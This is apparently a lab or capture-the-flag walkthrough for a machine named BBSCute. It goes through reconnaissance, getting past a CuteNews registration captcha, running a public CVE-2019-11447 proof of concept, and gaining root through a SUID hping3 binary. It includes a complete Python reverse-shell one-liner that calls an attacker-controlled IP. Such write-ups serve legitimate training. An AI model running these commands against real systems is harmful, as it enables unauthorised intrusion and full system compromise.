# BBSCute

## Nmap

```
sudo nmap   192.168.120.128 -p- -sS -sV                                      

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Navigating to port 80 in the browser lands us on the default install page for Apache.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d2669941e4c01a44fa38c5cc6bdd6dabfca2072e%2Fimage.png?alt=media)

Running `dirsearch.py` against the target web servers reveals index.php

```
python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1cd3c83f2cc81366b6e51d3c099be6d70ddcfe52%2Fimage.png?alt=media)

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3b3192e8e44a017778bc342301a82983918a0d05%2Fimage.png?alt=media)

Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding:

![/index.php?register](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-58193b9582601e396a7243ac7ed914e3ef37bf94%2Fimage.png?alt=media)

Reviewing the source of this page shows we do have a link for captcha.php.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4c5a088c7dfd78c99deaf5b62846f7f278e22a32%2Fimage.png?alt=media)

Viewing this will show what the current captcha should be.

![/captcha.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d0d66578a4f1701e0e48f853892696b73b55a7ec%2Fimage.png?alt=media)

Entering this into the registration field will allow us to proceed with new user creation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-760c317e8208dbe45bfd902c43ea0b00c2565e81%2Fimage.png?alt=media)

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with `searchsploit` shows the results below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7be9ee406f671f66bc3b3e907e9158bb3d883484%2Fimage.png?alt=media)

Searching further on Google for exploits we come across a PoC on GitHub located here: <https://github.com/CRFSlick/CVE-2019-11447-POC>.

Download the python script and the `sad.gif` files to the same directory. Run with the syntax shown below.

```
python3 <User> <Pass> http://192.168.120.128/index.php
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-953538203bc17090d068a76b77a6a454608c4e63%2Fimage.png?alt=media)

We can now run the following command to get a more usable reverse shell on a different listener:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-21863045dc6fdb435f73137aa6b52c3632592d1c%2Fimage.png?alt=media)

From here I uploaded `linpeas` which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c3c0e4a32b6e354ea7096001c64e3531e22d052%2Fimage.png?alt=media)

Then as per [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/) we can executed with the SUID bit to gain a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bda206f8547d9b16157c5456a3f23ceb8d755fa%2Fimage.png?alt=media)

```
/usr/sbin/hping3
/bin/sh -p

OR

./hping3
/bin/sh -p
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75792b8cfa5fb1d723b2667cedea2ef04b02d5ad%2Fimage.png?alt=media)